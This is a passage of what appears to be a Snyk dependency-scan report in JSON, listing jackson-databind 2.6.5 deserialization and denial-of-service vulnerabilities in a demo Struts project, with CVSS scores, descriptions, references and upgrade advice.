By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/7dbf51bf78d157098074a20bd9da39bd48c18e4a)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2854)\n- [GitHub Release](https://github.com/FasterXML/jackson-databind/releases/tag/jackson-databind-2.9.10.7)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1916633)\n", + "epssDetails": { + "percentile": "0.74700", + "probability": "0.00431", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-20190" + ], + "CWE": [ + "CWE-502", + "CWE-918" + ], + "GHSA": [ + "GHSA-5949-rw7g-wx7w" + ], + "RHSA": [ + "RHSA-1610966837463990" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-18T12:50:16.466618Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-16T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-18T17:23:46Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:17.193594Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-174736", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:R", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.9)", + "[2.8.0,2.8.11.4)", + "[2.7.0,2.7.9.6)", + "[,2.6.7.3)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.9", + "2.8.11.4", + "2.7.9.6", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable on systems using MySQL database" + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.9)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/dda513bd7251b4f32b7b60b1c13740e3b5a43024", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2326", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.9", + "title": "Github Release Tag" + }, + { + "url": "https://github.com/Al1ex/CVE-2019-12086", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": 
"2024-03-11T09:47:31.553438Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:49.785293Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:R", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:55.897269Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:31.553438Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:49.785293Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. When Default Typing is enabled for an externally exposed JSON endpoint, the service has the mysql-connector-java jar in the classpath. An attacker can host a crafted MySQL server reachable by the victim and send a crafted JSON message that allows them to read arbitrary local files on the server. This occurs due to missing `com.mysql.cj.jdbc.admin.MiniAdmin` validation.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9, 2.8.11.4, 2.7.9.6, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/dda513bd7251b4f32b7b60b1c13740e3b5a43024)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2326)\n- [Github Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.9)\n- [PoC](https://github.com/Al1ex/CVE-2019-12086)\n", + "epssDetails": { + "percentile": "0.74218", + "probability": "0.00415", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-12086" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-5ww9-j83m-q7qx" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-05-19T10:19:10.287403Z", + "functions_new": [ + { + "version": [ + "[,2.9.9)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-05-17T18:12:58Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": 
"maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-05-17T18:12:58Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:49.785293Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-2421244", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[, 2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.12.6.1", + "2.13.2.1" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable when using nested objects." 
+ }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [ + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/deser/std/UntypedObjectDeserializer$Vanilla.java", + "className": "UntypedObjectDeserializer$Vanilla", + "functionName": "mapArray" + } + }, + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/deser/std/UntypedObjectDeserializer.java", + "className": "UntypedObjectDeserializer", + "functionName": "createContextual" + } + }, + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/deser/std/UntypedObjectDeserializer.java", + "className": "UntypedObjectDeserializer", + "functionName": "mapObject" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/8238ab41d0350fb915797c89d46777b4496b74fd", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2816", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/pull/3416", + "title": "GitHub PR" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:49:21.238636Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:51:51.113569Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:50.929583Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:31.056720Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "SUSE", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:21.238636Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:51.113569Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:50.929583Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) via a large depth of nested objects.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. 
Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.12.6.1, 2.13.2.1 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/8238ab41d0350fb915797c89d46777b4496b74fd)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2816)\n- [GitHub PR](https://github.com/FasterXML/jackson-databind/pull/3416)\n", + "epssDetails": { + "percentile": "0.60309", + "probability": "0.00218", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36518" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2022-03-11T13:26:43.073121Z", + "functions_new": [ + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "className": 
"com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer$Vanilla", + "functionName": "mapArray" + } + }, + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer", + "functionName": "createContextual" + } + }, + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer", + "functionName": "mapObject" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2022-03-11T13:18:25Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2022-03-11T14:24:04Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:50.929583Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-3038424", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.4.0,2.12.7.1)", + "[2.13.0,2.13.4)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.12.7.1", + "2.13.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": 
"java", + "severity": "medium", + "cvssScore": 5.9, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50490", + "title": "Chromium Bugs" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/063183589218fec19a9293ed2f17ec53ea80ba88", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3582", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:51:50.588412Z" + }, + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:52:30.271111Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:57.261115Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:36.201956Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:50.588412Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "SUSE", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": 
"2024-03-11T09:52:30.271111Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:57.261115Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) in the `_deserializeFromArray()` function in `BeanDeserializer`, due to resource exhaustion when processing a deeply nested array.\r\n\r\n**NOTE:**\r\nFor this vulnerability to be exploitable the non-default `DeserializationFeature` must be enabled.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.12.7.1, 2.13.4 or higher.\n## References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50490)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/063183589218fec19a9293ed2f17ec53ea80ba88)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3582)\n", + "epssDetails": { + "percentile": "0.66401", + "probability": "0.00264", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-42004" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2022-10-02T09:21:18.588353Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-10-02T09:07:28Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2022-10-02T10:05:31.043255Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:57.261115Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "medium" + 
}, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-3038426", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.4.0,2.12.7.1)", + "[2.13.0,2.13.4.1)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.12.7.1", + "2.13.4.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.9, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=51020", + "title": "Chromium Bugs" + }, + { + "url": "https://fasterxml.github.io/jackson-databind/javadoc/2.9/com/fasterxml/jackson/databind/DeserializationFeature.html%23UNWRAP_SINGLE_VALUE_ARRAYS", + "title": "Documentation" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/2c4a601c626f7790cad9d3c322d244e182838288", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/d78d00ee7b5245b93103fef3187f70543d67ca33", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3590", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:51:50.575208Z" + }, + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:52:30.263069Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + 
"cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:57.258948Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:36.284440Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:50.575208Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "SUSE", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:30.263069Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:57.258948Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) in the `_deserializeWrappedValue()` function in `StdDeserializer.java`, due to resource exhaustion when processing deeply nested arrays.\r\n\r\n**NOTE:** This vulnerability is only exploitable when the non-default `UNWRAP_SINGLE_VALUE_ARRAYS` feature is enabled.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. 
Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.12.7.1, 2.13.4.1 or higher.\n## References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=51020)\n- [Documentation](https://fasterxml.github.io/jackson-databind/javadoc/2.9/com/fasterxml/jackson/databind/DeserializationFeature.html#UNWRAP_SINGLE_VALUE_ARRAYS)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/2c4a601c626f7790cad9d3c322d244e182838288)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d78d00ee7b5245b93103fef3187f70543d67ca33)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3590)\n", + "epssDetails": { + "percentile": "0.65501", + "probability": "0.00252", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-42003" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": 
